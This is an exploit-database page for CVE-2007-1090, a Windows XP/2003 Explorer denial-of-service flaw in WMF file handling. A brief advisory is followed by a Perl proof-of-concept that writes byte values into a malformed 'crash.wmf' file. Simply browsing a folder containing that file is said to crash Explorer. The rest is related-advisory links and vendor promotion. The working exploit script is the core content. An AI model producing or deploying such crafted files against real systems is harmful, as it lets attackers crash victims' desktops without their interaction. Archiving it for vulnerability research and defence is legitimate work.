Lucene search
+L

Microsoft Windows XP/2003 - Explorer '.WMF' File Handling Denial of Service

🗓️ 25 Feb 2007 00:00:00Reported by sehatoType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 18 Views

Microsoft Windows XP/2003 Explorer WMF File Handling Do

Related
Code
ReporterTitlePublishedViews
Family
Check Point Advisories
Windows Explorer WMF Unspecified Denial of Service - Ver2 (CVE-2007-1090)
16 Apr 201400:00
checkpoint_advisories
CVE
CVE-2007-1090
26 Feb 200711:00
cve
Cvelist
CVE-2007-1090
26 Feb 200711:00
cvelist
NVD
CVE-2007-1090
26 Feb 200711:28
nvd
Prion
Design/Logic Flaw
26 Feb 200711:28
prion
securityvulns
Microsoft Windows Explorer DoS
26 Feb 200700:00
securityvulns
source: https://www.securityfocus.com/bid/22715/info

Microsoft Windows Explorer is prone to a denial-of-service vulnerability.

A remote attacker may exploit this vulnerability by presenting a malicious file to a victim user. Users do not have to open the file -- simply browsing a folder containing the malicious file is sufficient to trigger this issue.

A successful exploit will crash the vulnerable application, effectively denying service.

This issue may be related to BID 19365 (Microsoft Windows GDI32.DLL WMF Remote Denial of Service Vulnerability) or BID 21992 (Microsoft Windows Explorer WMF File Denial of Service Vulnerability).

#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by AzM";
print "\n\ngenerating crash.wmf...";
open(WMF, ">./crash.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x01\x00\x84\x43\x00\x00";
print WMF "\x00\x00\x10\x00\x00\x00\x26\x06\x0A\x00\x16\x00\x90\x90\x90\x90";
print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "Ok\n";

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Nov 2013 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.1
EPSS0.16388
18